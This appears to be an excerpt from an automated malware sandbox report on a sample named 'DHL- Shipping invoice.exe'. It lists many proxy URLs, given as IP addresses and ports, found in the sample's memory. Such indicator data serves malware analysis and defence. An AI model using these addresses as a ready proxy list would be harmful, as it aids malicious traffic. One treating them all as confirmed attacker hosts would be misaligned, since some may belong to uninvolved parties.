                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.230.144.251:8118
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980385000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.233.102.111:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.233.102.111:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.26.223.96:9080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.26.223.96:9080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.40.178
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.40.178://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9838EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.40.178:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981454000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.98.160:8998
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.98.160:8998://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.44.238.2:53471
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.44.238.2:57167://proxyH
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.97.201.252
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.97.201.252://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.97.201.252:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.10.69.102:9090
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.10.69.102:9090://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.172.137:47421
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.172.137:47421://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.133.200.94:31596
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.133.200.94:31596://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.233.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.233.76:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.233.76:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980768000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.72.195:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.72.195:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.73.50:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.73.50:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.1.95:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.1.95:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.10.195:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.11.2
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.11.225:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.11.225:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.11.81:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.11.81:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980A6D000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980BA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.14.48:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980A95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.14.48:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.16.221:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.16.221:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.17.13:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.17.13:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.19.2
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.19.212:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.19.212:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.19.55:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.19.55:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.21.241:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.21.241:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.21.241:3128HJ
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.22.48:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.22.48:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.22.91:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.22.91:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.24.2
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.24.242:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.24.242:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.25.143:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.25.143:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.25.164:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.25.164:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.29.144:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981534000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.29.144:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.29.85:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.29.85:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.31.211:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.31.211:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.6.103:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.6.103:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.8.212:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.8.212:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.9.72:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.9.72:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.9.79:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.162.9.79:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.180.122.129
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.180.122.129://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.180.122.129:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.180.36.19:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.180.64.212:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.180.64.212:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.242.199.111:33458
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.242.199.111:33458://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.242.199.111:5670
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.242.199.111:5670://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.252.208.115:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.252.208.115:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.0
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9806EF000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.0.60:11201
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98072F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.0.60:11201://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.0.6:11201
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.0.6:11201://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.0.94:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.0.94:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.48.98.38
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.48.98.38:28080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.48.98.38:28080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.50.130.93:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.50.130.93:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.51.49.84:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.51.49.84:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.52.222.220:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.52.222.220:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.101.254:9000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.101.254:9000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.116.9:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.116.9:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.38.116:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.79.150
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.79.150://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.79.150:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.95.19:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.95.19:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.56.23.33:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.56.23.33:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.56.70.97:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.56.70.97:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.109.253:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.109.253:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.204.129:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.204.129:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.4.90:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.4.90:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.100.82.188:8888
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.100.82.188:8888://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.108.102.73:5100
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.108.102.73:5100://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.108.227.108
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.108.227.108://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.108.227.108:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.108.229.14:8002
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.108.229.14:8002://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.144.161.159
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.144.161.159://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.144.161.159:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.182.9.108:443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.182.9.108:443://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.236.183.37:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.236.183.37:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://40.76.160.1
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://40.76.160.143:9002
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://40.76.160.143:9002://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.111.198.108
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.111.198.108://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.111.198.108:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.111.243.134
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.111.243.134://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.111.243.134:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.155.190.214:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.155.190.214:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.174.96.38:32650
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.174.96.38:32650://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.204.63.118
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.204.63.118://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.204.63.118:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.215.82.206:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.215.82.206:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.216.175.214:4673
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.216.175.214:4673://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.217.220.214:32650
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.217.220.214:32650://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.222.8.254:8082
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.222.8.254:8082://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.223.108.13:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.223.232.117:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.223.232.117:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.254.53.70:1981
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.219.131:1981
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.219.131:1981://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.254.188:1976
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.254.188:1976://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.254.188:1981
